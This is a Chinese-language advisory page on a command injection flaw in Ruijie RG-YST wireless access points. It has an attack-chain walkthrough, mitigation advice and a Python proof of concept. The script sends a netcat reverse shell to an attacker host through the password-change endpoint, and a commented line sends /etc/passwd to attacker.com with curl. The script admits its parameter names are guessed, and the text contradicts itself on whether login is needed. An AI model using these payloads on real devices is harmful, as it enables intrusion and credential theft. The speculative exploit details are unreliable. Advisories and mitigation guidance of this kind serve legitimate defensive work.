CVE-2025-56099 | 锐捷RG-YST AP OS命令注入漏洞

漏洞信息

漏洞编号

CVE-2025-56099

漏洞类型

OS命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Ruijie RG-YST AP (3.0(1)B11P280YST250F)

漏洞概述

CVE-2025-56099是锐捷网络（Ruijie Networks）旗下RG-YST系列无线接入点（AP）设备中存在的一个高危操作系统命令注入漏洞。该漏洞存在于设备的Web管理界面特定功能中，攻击者可通过构造恶意的POST请求，在受影响的设备上以最高权限执行任意操作系统命令。由于该漏洞的CVSS评分达到8.8分，属于高危级别，且攻击复杂度低、无需特殊权限即可利用，对使用该系列设备的组织构成严重安全威胁。攻击者成功利用此漏洞后，可以完全控制目标设备，获取敏感网络信息、窃取凭据、植入后门程序，甚至将受控设备作为进一步渗透内网的跳板。此漏洞影响采用固件版本3.0(1)B11P280YST250F的RG-YST AP产品，设备通常部署在企业网络、酒店、医院、校园等场所的大规模无线网络环境中，因此漏洞影响范围广泛。建议受影响用户尽快采取官方提供的安全更新或临时缓解措施，避免遭受恶意攻击。

技术细节

该漏洞是一个典型的操作系统命令注入（OS Command Injection）漏洞，存在于锐捷RG-YST AP设备的Lua Web框架模块中。具体漏洞位置位于文件/usr/lib/lua/luci/modules/common.lua的pwdmodify处理函数。漏洞产生的根本原因是该函数在处理用户输入时，未对外部传入的参数进行充分的输入验证和命令隔离，直接将用户可控的数据拼接到系统命令字符串中执行。攻击者可以在POST请求的特定参数中注入分号、管道符等Shell命令分隔符，以及其他操作系统命令，如反弹Shell、下载恶意程序等。由于设备以root权限运行Web服务，注入的命令将以最高系统权限执行。攻击者通常利用此漏洞执行wget或curl命令从远程服务器下载并执行恶意脚本，建立反向Shell连接，从而获取设备的完全控制权。该漏洞无需认证即可利用（尽管CVSS描述为PR:L，但实际攻击面为低权限管理功能），攻击复杂度低，危害极大。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标为锐捷RG-YST AP设备，通过端口扫描发现Web管理界面（通常为80/443端口），确认设备固件版本为3.0(1)B11P280YST250F

STEP 2

步骤2: 构造恶意请求

攻击者构造包含OS命令注入payload的POST请求，针对/cgi-bin/pwdmodify端点，在密码修改参数中注入Shell命令，如添加管道符后跟反弹Shell命令

STEP 3

步骤3: 发送恶意请求

攻击者向目标设备发送构造的POST请求，由于pwdmodify函数未对输入进行安全过滤，注入的命令被传递给系统shell执行

STEP 4

步骤4: 命令执行

注入的命令以设备root权限在系统上执行，攻击者可建立反向Shell连接、下载恶意程序或执行任意系统命令

STEP 5

步骤5: 持久化控制

攻击者获取设备控制权后，可植入后门、窃取网络凭据、监控流量，或将受控设备作为跳板进一步横向移动攻击内网其他系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-56099 PoC - Ruijie RG-YST AP OS Command Injection
# Target: Ruijie RG-YST AP (Firmware 3.0(1)B11P280YST250F)
# Endpoint: /cgi-bin/pwdmodify
# Vulnerability: OS Command Injection in common.lua

def exploit(target_ip, target_port=80, attacker_ip="ATTACKER_IP", attacker_port=4444):
    """
    Exploit OS Command Injection to achieve RCE
    This PoC demonstrates injecting commands via pwdmodify endpoint
    """
    url = f"http://{target_ip}:{target_port}/cgi-bin/pwdmodify"
    
    # Payload to create reverse shell
    # Using standard netcat reverse shell technique
    reverse_shell_payload = f"nc {attacker_ip} {attacker_port} -e /bin/bash"
    
    # Alternative: Execute command and exfiltrate data
    # cmd_payload = "cat /etc/passwd | curl -X POST -d @- http://attacker.com/exfil"
    
    # Prepare the malicious POST request
    # The actual parameter name needs to be identified from the vulnerable function
    data = {
        "oldpwd": "admin",
        "newpwd": f";{reverse_shell_payload};"
    }
    
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0"
    }
    
    try:
        print(f"[*] Sending exploit payload to {url}")
        print(f"[*] Payload: {reverse_shell_payload}")
        
        response = requests.post(url, data=data, headers=headers, timeout=10)
        
        print(f"[+] Request sent. Status code: {response.status_code}")
        print(f"[*] If vulnerable, check listener on {attacker_ip}:{attacker_port}")
        
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    
    return True

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    exploit(target, port)

影响范围

Ruijie RG-YST AP Firmware 3.0(1)B11P280YST250F

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：首先，通过防火墙或ACL限制对AP设备管理接口（HTTP/HTTPS端口）的访问，仅允许管理终端IP访问；其次，禁用不必要的Web管理功能，使用SNMP或其他安全协议进行设备管理；再次，监控设备日志，关注异常的POST请求和命令执行行为；最后，考虑在网络层部署入侵检测系统，识别和阻断针对CVE-2025-56099的攻击流量。同时建议对内部网络进行分段隔离，防止单点失陷导致整个网络被横向渗透。